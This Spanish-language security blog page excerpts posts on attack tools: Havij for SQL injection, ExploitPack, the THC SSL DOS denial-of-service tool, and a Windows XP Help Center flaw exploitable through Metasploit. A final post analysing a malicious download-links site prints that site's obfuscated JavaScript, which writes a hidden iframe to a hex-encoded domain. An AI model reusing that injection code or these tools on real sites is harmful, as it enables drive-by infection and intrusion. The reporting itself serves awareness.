Havij es una herramienta fabricada en los Emiratos Árabes Unidos por IT Security Research & Penetration Testing Team, que automatiza las inyecciónes SQL y ayuda a los testers a encontrar y explotar vulnerabilidades de inyección SQL en una página web. Al utilizar este software el usuario puede realizar back-end de base de datos de huellas digitales, recuperar los usuarios,  DBMS y los hashes de contraseñas, tablas y columnas de descarga, ejecutar sentencias SQL, e incluso acceder al sistema de archivos subyacente y ejecutar comandos en el sistema operativo.

El poder de Havij lo hace diferente a otras herramientas similares en su método de inyección. La tasa de éxito es superior al 95% en objetivos vulnerables. La amigable interfaz gráfica (Graphical User Interface) de Havij y la configuración y detección automática hace que sea fácil de usar para los usuarios de todo el mundo, incluso para los aficionados. Read the rest of this entry

Safety Lab Shadow Security Scanner, es, como bien dicen en su web oficial, un estupendo y viejo conocido escáner de red proactivo de Safety Lab que analiza vulnerabilidades con más de 5.000 auditorías. Es una nueva generación de software de alta tecnología (network vulnerability assessment scanner), Shadow Security Scanner (network vulnerability assessment scanner) se ha ganado el nombre de ser de los más rápidos  y de mejor rendimiento del mercado (en su sector), superando a muchas marcas famosas. Shadow Security Scanner ha sido desarrollado para proporcionar una detección segura, rápida y fiable de una amplia gama de agujeros de seguridad. Después de completar el escaneo del sistema, SSS analiza los datos recogidos, las vulnerabilidades y localiza posibles errores sugiriendo posibles vías de solución al problema. Shadow Security Scanner emplea un sistema de seguridad único, un algoritmo de análisis basado en un sistema patentado de “intellectual core” . Éste preciso y rápido escáner le ayuda a realizar una exploración del sistema, a fin de poder solventar los bugs que aprovechan los piratas informáticos. Read the rest of this entry

En su página web dicen que ExploitPack es un framework de seguridad con licencia GPL de código abierto que combina las ventajas de una interfaz gráfica de usuario Java, Python como motor y exploits bien conocidos. Tiene un IDE para hacer la tarea de desarrollar nuevos exploits más fácil, la búsqueda instantánea y módulos basados ​​en XML.

La licencia GPL de todo el proyecto garantiza que el código siempre será libre. Un sistema de clasificación para los contribuyentes, las clases particulares para todos los que quieran aprender a crear nuevos exploits y una comunidad para pedir ayuda. Read the rest of this entry

Si ya hace algún tiempo la noticia fue que el cifrado en conexiones SSL había sido vulnerado y se había conseguido captar y descifrar los datos transportados por el viejo protocolo SSL 1.0, hoy, un grupo llamado The Hacker’s Choice ha publicado recientemente una herramienta llamada THC SSL DOS, que según comentan, consigue agotar los recursos (CPU en éste caso) del servidor y dejarlo fuera de internet mientras el software corre.

Ésta herramienta de denegación de servicio (DoS) funciona desde un solo punto, y consigue agotar los recursos del servidor remoto aún sin tener demasiado ancho de banda. Read the rest of this entry

La vulnerabilidad, conocida desde mediados de junio de 2010 y descubierta por Travis Ormandy, un ingeniero de Google, no fue tomada con mayor preocupación por Microsoft, al menos hasta ahora.

La compañía indicaba que el error, tal como lo mostraba Ormandy, no era de mayor importancia para los usuarios. Sin embargo, en los últimos días se han empezado a detectar ataques reales a través de dicho bug, para el cuál hasta el momento no existe parche automático (vía Windows Update)  para remendarlo, aunque ya hay un Fix a disposición de los usuarios desde la web de microsoft.

El sistema de ayuda integrado en Windows XP, está creado con la idea de brindar soporte a distancia a sus usuarios, y es parte del propio sistema operativo.

En las últimas horas, se calculan más de 10.000 máquinas atacadas utilizando esta vulnerabilidad, para explotarla solo debes lanzarla desde Metasploit.

Según el propio blog de seguridad de Microsoft, a través de las máquinas atacadas exitosamente, se están distribuyendo otros troyanos y malwares similares. Esto podría facilitar la creación de nuevas redes de máquinas zombi, aquellas que son “tomadas” por los delincuentes informáticos para su propio provecho, sin que el usuario de las mismas se percate de ello. Read the rest of this entry

Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry